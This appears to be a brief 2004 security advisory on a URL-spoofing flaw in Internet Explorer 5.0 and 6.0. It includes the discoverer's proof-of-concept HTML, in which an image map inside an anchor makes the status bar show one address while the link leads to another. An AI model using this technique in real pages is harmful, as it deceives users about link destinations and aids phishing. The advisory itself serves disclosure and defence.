Reported May 18, 2004, by Paul Kurczaba
VERSIONS AFFECTED
|
DESCRIPTION
A vulnerability in IE 5.0 and 6.0 could let a potential
attacker spoof the URL displayed in the lower left corner of the IE window by
using a specially coded image map.
DEMONSTRATION
The discoverer posted the following code as proof of concept and has made a demonstration available on his Web site.< A
HREF="http://www.microsoft.com/">
< map name="FPMap0">
< area coords="0, 6, 151, 32" shape="rect"
href="http://www.linux.com">
</map>
< img SRC="http://www.kurczaba.com/images/0405132-graphic2.gif"
WIDTH="156" HEIGHT="38" border="0"
usemap="#FPMap0"></A>
</a>
VENDOR RESPONSE
Microsoft hasn't
released a fix or bulletin that addresses this vulnerability.
CREDIT
Discovered by Paul Kurczaba.
7 comments
Hide comments